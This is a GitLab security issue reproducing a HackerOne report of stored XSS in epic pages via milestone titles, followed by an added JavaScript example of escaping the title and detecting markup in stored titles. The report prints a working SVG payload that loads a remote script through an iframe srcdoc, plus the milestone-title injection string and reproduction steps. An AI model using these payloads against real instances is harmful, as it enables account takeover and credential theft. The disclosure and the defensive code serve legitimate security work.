GitLab.org / GitLab / Issues / #294176
Issue created Dec 16, 2020 by GitLab SecurityBot (@gitlab-securitybot), Reporter

Stored XSS in epic's pages

HackerOne report #1055814 by mike12 on 2020-12-10, assigned to @rchan-gitlab:


Report

Hi GitLab!

It's possible to inject arbitrary JS code into an epic's page using the Start date and Due date.

This XSS works for:

  1. gitlab.com using Firefox (tested in Firefox 83.0)
  2. A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1), Chrome (tested in Chrome 87.0.4280.88) or Firefox

Steps to reproduce using Firefox
  1. Open your browser and navigate to https://gitlab.com

  2. Create a group and a project in it

  3. Add a file named demo.svg to the project with the following content:

    <svg id="x"
         xmlns="http://www.w3.org/2000/svg"
         width="100"
         height="100"
    >
        <foreignObject>
            <iframe xmlns="http://www.w3.org/1999/xhtml"
                    srcdoc='<script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js> </script>'></iframe>
        </foreignObject>

        <image href="foo" onerror="alert('onerror')"/>

        <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')">
            <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/>
            <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text>
        </a>
    </svg>

  4. Create a new epic in the group

  5. Create a new issue in the project

  6. Assign the created epic to the issue

  7. Create a new milestone in the project

    1. Title: <svg width="100"><use xlink:href="/<YOUR-GROUP-NAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x" /></svg> (Replace <YOUR-GROUP-NAME> and <YOUR-PROJECT> with your values)
    2. Specify any valid Start Date and Due Date values
  8. Assign the created milestone to the issue

  9. Navigate to the epic created in step 4

  10. Hover your mouse over the inherited due date

[Screenshot: 1.png]

Steps to reproduce using Safari

  1. Run a self-hosted GitLab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.

Steps to reproduce using Chrome

  1. Run a self-hosted GitLab instance
  2. Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
  3. Click the red circle in the due date tooltip.

[Screenshot: 2.png]

[Screenshot: 3.png]

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data, including credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • 2.png
  • 1.png
  • 3.png

How To Reproduce

Please add reproducibility information to this section:
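Added example (not GitLab's code and not part of the HackerOne report): the shape of the defect the report describes is a milestone title interpolated into tooltip markup as raw HTML, and the fix is to escape it for the HTML context before it reaches the DOM. The functions `escapeHtml`, `buildDueDateTooltipUnsafe`, `buildDueDateTooltip` and `titleLooksLikeMarkup` and the `sampleMilestone` object are hypothetical; the sample title reuses the structure quoted in step 7 with the group and project path replaced by placeholders. The report shows that CSP only partially contains the payload (it still fires in Firefox on gitlab.com), so output escaping, not CSP, is the primary control; CSP remains a second layer. The block runs in Node without a DOM.

```javascript
// Added example, not GitLab's implementation: escape untrusted milestone titles
// before placing them into tooltip HTML. Runs under Node, no DOM required.

// Every character that changes meaning in HTML text or attribute context.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Render a string as literal text: the browser will never parse it as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical tooltip builders. The unsafe one interpolates the stored title
// as-is, which is the class of bug in the report: a title containing <svg>
// becomes live markup inside the tooltip.
function buildDueDateTooltipUnsafe(milestone) {
  return (
    `<span class="milestone-title">${milestone.title}</span> ` +
    `<span class="due-date">${milestone.dueDate}</span>`
  );
}

// Hardened form: every untrusted field is escaped for the HTML context.
function buildDueDateTooltip(milestone) {
  return (
    `<span class="milestone-title">${escapeHtml(milestone.title)}</span> ` +
    `<span class="due-date">${escapeHtml(milestone.dueDate)}</span>`
  );
}

// Defender-side audit predicate: flag stored titles that would open a tag if
// they were ever interpolated raw. Useful for a one-off scan of existing data.
function titleLooksLikeMarkup(title) {
  return /<[a-zA-Z!\/]/.test(String(title));
}

// Constructed sample (hypothetical): the title structure from step 7 of the
// report with the group/project path replaced by placeholders.
const sampleMilestone = {
  title:
    '<svg width="100"><use xlink:href="/GROUP/PROJECT/-/raw/master/demo.svg#x" /></svg>',
  dueDate: "2020-12-31",
};

console.log("unsafe:", buildDueDateTooltipUnsafe(sampleMilestone));
console.log("safe:  ", buildDueDateTooltip(sampleMilestone));
console.log("title looks like markup:", titleLooksLikeMarkup(sampleMilestone.title));
```

In DOM or Vue code the equivalent is to bind the title as text (`textContent`, or a `{{ }}` interpolation) rather than through `innerHTML` or `v-html`; the string-level escape above is the same rule applied where markup is assembled by hand. Escaping is context-specific: this table is correct for HTML text and quoted attribute values, not for URLs or inline script.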
